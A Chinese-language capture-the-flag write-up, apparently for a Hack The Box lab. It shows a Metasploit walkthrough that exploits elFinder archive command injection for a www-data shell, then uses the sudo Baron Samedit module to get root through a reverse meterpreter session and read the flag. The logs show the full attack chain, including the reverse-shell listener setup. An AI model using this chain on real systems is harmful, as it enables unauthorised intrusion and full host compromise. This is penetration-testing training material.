题目

2024-01-19T07:49:06.png

解答


题目一


┌──(kali㉿HgTrojan)-[~]
└─$ curl 10.129.203.52
<!DOCTYPE html>
<html>
        <head>
                <meta charset="utf-8">
                <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
                <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
                <title>elFinder 2.1.x source version with PHP connector</title>

                <!-- Require JS (REQUIRED) -->
                <!-- Rename "main.default.js" to "main.js" and edit it if you need configure elFInder 2.1.53 options or any things -->
                <script data-main="./main.default.js" src="//cdnjs.cloudflare.com/ajax/libs/require.js/2.3.6/require.min.js"></script>
                <script>
                        define('elFinderConfig', {
                                // elFinder options (REQUIRED)
                                // Documentation for client options:
                                // https://github.com/Studio-42/elFinder/wiki/Client-configuration-options
                                defaultOpts : {
                                        url : 'php/connector.minimal.php', // or connector.maximal.php : connector URL (REQUIRED)
                                        commandsOptions : {
                                                edit : {
                                                        extraOptions : {
                                                                // set API key to enable Creative Cloud image editor
                                                                // see https://console.adobe.io/
                                                                creativeCloudApiKey : '',
                                                                // browsing manager URL for CKEditor, TinyMCE
                                                                // uses self location with the empty value
                                                                managerUrl : ''
                                                        }
                                                },
                                                quicklook : {
                                                        // to enable CAD-Files and 3D-Models preview with sharecad.org
                                                        sharecadMimes : ['image/vnd.dwg', 'image/vnd.dxf', 'model/vnd.dwf', 'application/vnd.hp-hpgl', 'application/plt', 'application/step', 'model/iges', 'application/vnd.ms-pki.stl', 'application/sat', 'image/cgm', 'application/x-msmetafile'],
                                                        // to enable preview with Google Docs Viewer
                                                        googleDocsMimes : ['application/pdf', 'image/tiff', 'application/vnd.ms-office', 'application/msword', 'application/vnd.ms-word', 'application/vnd.ms-excel', 'application/vnd.ms-powerpoint', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 'application/vnd.openxmlformats-officedocument.presentationml.presentation', 'application/postscript', 'application/rtf'],
                                                        // to enable preview with Microsoft Office Online Viewer
                                                        // these MIME types override "googleDocsMimes"
                                                        officeOnlineMimes : ['application/vnd.ms-office', 'application/msword', 'application/vnd.ms-word', 'application/vnd.ms-excel', 'application/vnd.ms-powerpoint', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 'application/vnd.openxmlformats-officedocument.presentationml.presentation', 'application/vnd.oasis.opendocument.text', 'application/vnd.oasis.opendocument.spreadsheet', 'application/vnd.oasis.opendocument.presentation']
                                                }
                                        },
                                        // bootCalback calls at before elFinder boot up 
                                        bootCallback : function(fm, extraObj) {
                                                /* any bind functions etc. */
                                                fm.bind('init', function() {
                                                        // any your code
                                                });
                                                // for example set document.title dynamically.
                                                var title = document.title;
                                                fm.bind('open', function() {
                                                        var path = '',
                                                                cwd  = fm.cwd();
                                                        if (cwd) {
                                                                path = fm.path(cwd.hash) || null;
                                                        }
                                                        document.title = path? path + ':' + title : title;
                                                }).bind('destroy', function() {
                                                        document.title = title;
                                                });
                                        }
                                },
                                managers : {
                                        // 'DOM Element ID': { /* elFinder options of this DOM Element */ }
                                        'elfinder': {}
                                }
                        });
                </script>
        </head>
        <body>

                <!-- Element where elFinder will be created (REQUIRED) -->
                <div id="elfinder"></div>

        </body>
</html>


题目二


已知框架为elFinder 2.1.x,msf启动

┌──(root㉿HgTrojan)-[/home/kali]
└─# msfconsole
Metasploit tip: View missing module options with show missing
                                                  

Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f                                                             
EFLAGS: 00010046                                                                                                                           
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001                                                                                    
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60                                                                                    
ds: 0018   es: 0018  ss: 0018                                                                                                              
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)                                                                                
                                                                                                                                           
                                                                                                                                           
Stack: 90909090990909090990909090                                                                                                          
       90909090990909090990909090                                                                                                          
       90909090.90909090.90909090                                                                                                          
       90909090.90909090.90909090                                                                                                          
       90909090.90909090.09090900                                                                                                          
       90909090.90909090.09090900                                                                                                          
       ..........................                                                                                                          
       cccccccccccccccccccccccccc                                                                                                          
       cccccccccccccccccccccccccc                                                                                                          
       ccccccccc.................                                                                                                          
       cccccccccccccccccccccccccc                                                                                                          
       cccccccccccccccccccccccccc                                                                                                          
       .................ccccccccc                                                                                                          
       cccccccccccccccccccccccccc                                                                                                          
       cccccccccccccccccccccccccc                                                                                                          
       ..........................                                                                                                          
       ffffffffffffffffffffffffff                                                                                                          
       ffffffff..................                                                                                                          
       ffffffffffffffffffffffffff                                                                                                          
       ffffffff..................                                                                                                          
       ffffffff..................                                                                                                          
       ffffffff..................                                                                                                          
                                                                                                                                           

Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N5 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing                                                                                                              


       =[ metasploit v6.3.51-dev                          ]
+ -- --=[ 2384 exploits - 1235 auxiliary - 418 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search elFinder 

Matching Modules
================

   #  Name                                                               Disclosure Date  Rank       Check  Description
   -  ----                                                               ---------------  ----       -----  -----------
   0  exploit/multi/http/builderengine_upload_exec                       2016-09-18       excellent  Yes    BuilderEngine Arbitrary File Upload Vulnerability and execution
   1  exploit/unix/webapp/tikiwiki_upload_exec                           2016-07-11       excellent  Yes    Tiki Wiki Unauthenticated File Upload Vulnerability
   2  exploit/multi/http/wp_file_manager_rce                             2020-09-09       normal     Yes    WordPress File Manager Unauthenticated Remote Code Execution
   3  exploit/linux/http/elfinder_archive_cmd_injection                  2021-06-13       excellent  Yes    elFinder Archive Command Injection
   4  exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection  2019-02-26       excellent  Yes    elFinder PHP Connector exiftran Command Injection


Interact with a module by name or index. For example info 4, use 4 or use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection

msf6 > use 3

填写完信息run,我们就获取了www-data权限。


题目三


根据题目已知sudo存在漏洞,
按 Ctrl + z 获取当前会话,创建新会话

meterpreter > 
Background session 1? [y/N]  
msf6 exploit(linux/http/elfinder_archive_cmd_injection) > sessions

Active sessions
===============

  Id  Name  Type                   Information               Connection
  --  ----  ----                   -----------               ----------
  1         meterpreter x86/linux  www-data @ 10.129.203.52  10.10.16.39:4444 -> 10.129.203.52:54160 (10.129.
                                                             203.52)

msf6 exploit(linux/http/elfinder_archive_cmd_injection) > search sudo 1.8.31

Matching Modules
================

   #  Name                                    Disclosure Date  Rank       Check  Description
   -  ----                                    ---------------  ----       -----  -----------
   0  exploit/linux/local/sudo_baron_samedit  2021-01-26       excellent  Yes    Sudo Heap-Based Buffer Overflow


Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/local/sudo_baron_samedit                                                                                                              

msf6 exploit(linux/http/elfinder_archive_cmd_injection) > use 0
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/sudo_baron_samedit) > show options 

Module options (exploit/linux/local/sudo_baron_samedit):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   SESSION                       yes       The session to run this module on
   WritableDir  /tmp             yes       A directory where you can write files.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.10.131      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/sudo_baron_samedit) > set session 1
session => 1
msf6 exploit(linux/local/sudo_baron_samedit) > set l
set lengths   set lhost     set loglevel  set lport     
msf6 exploit(linux/local/sudo_baron_samedit) > set lhost 10.10.16.39
lhost => 10.10.16.39
msf6 exploit(linux/local/sudo_baron_samedit) > run

[*] Started reverse TCP handler on 10.10.16.39:4444 
[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: x86
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. sudo 1.8.31 may be a vulnerable build.
[*] Using automatically selected target: Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)
[*] Writing '/tmp/EaLIXMf51.py' (763 bytes) ...
[*] Writing '/tmp/libnss_Ubl/QLO .so.2' (548 bytes) ...
[*] Sending stage (3045380 bytes) to 10.129.203.52
[+] Deleted /tmp/EaLIXMf51.py
[+] Deleted /tmp/libnss_Ubl/QLO .so.2
[*] 
[*] Alternative exploit target(s) exist for this OS version:
[*] 2: Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31) - alternative
[*] Run `set target <id>` to select an alternative exploit script
[+] Deleted /tmp/libnss_Ubl
[*] Meterpreter session 2 opened (10.10.16.39:4444 -> 10.129.203.52:54646) at 2024-01-19 02:46:28 -0500

meterpreter > shell
Process 20457 created.
Channel 1 created.
^C
Terminate channel 1? [y/N]  y
meterpreter > cd /root
meterpreter > ls
Listing: /root
==============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100600/rw-------  178    fil   2022-05-16 11:35:30 -0400  .bash_history
100644/rw-r--r--  3106   fil   2022-05-16 11:34:51 -0400  .bashrc
040700/rwx------  4096   dir   2022-05-16 09:46:07 -0400  .cache
040700/rwx------  4096   dir   2022-05-16 09:46:06 -0400  .config
040755/rwxr-xr-x  4096   dir   2022-05-16 09:46:07 -0400  .local
100644/rw-r--r--  161    fil   2019-12-05 09:39:21 -0500  .profile
100644/rw-r--r--  75     fil   2022-05-16 04:45:33 -0400  .selected_editor
040700/rwx------  4096   dir   2021-10-06 13:37:09 -0400  .ssh
100600/rw-------  13300  fil   2022-05-16 11:34:51 -0400  .viminfo
100644/rw-r--r--  291    fil   2022-05-16 09:51:29 -0400  .wget-hsts
100644/rw-r--r--  24     fil   2022-05-16 11:18:40 -0400  flag.txt
040755/rwxr-xr-x  4096   dir   2021-10-06 13:37:19 -0400  snap

meterpreter > cat flag.txt
HTB{5e55ion5_4r3_sw33t}
meterpreter > 

至于此提权root,flag获取成功 。

文章目录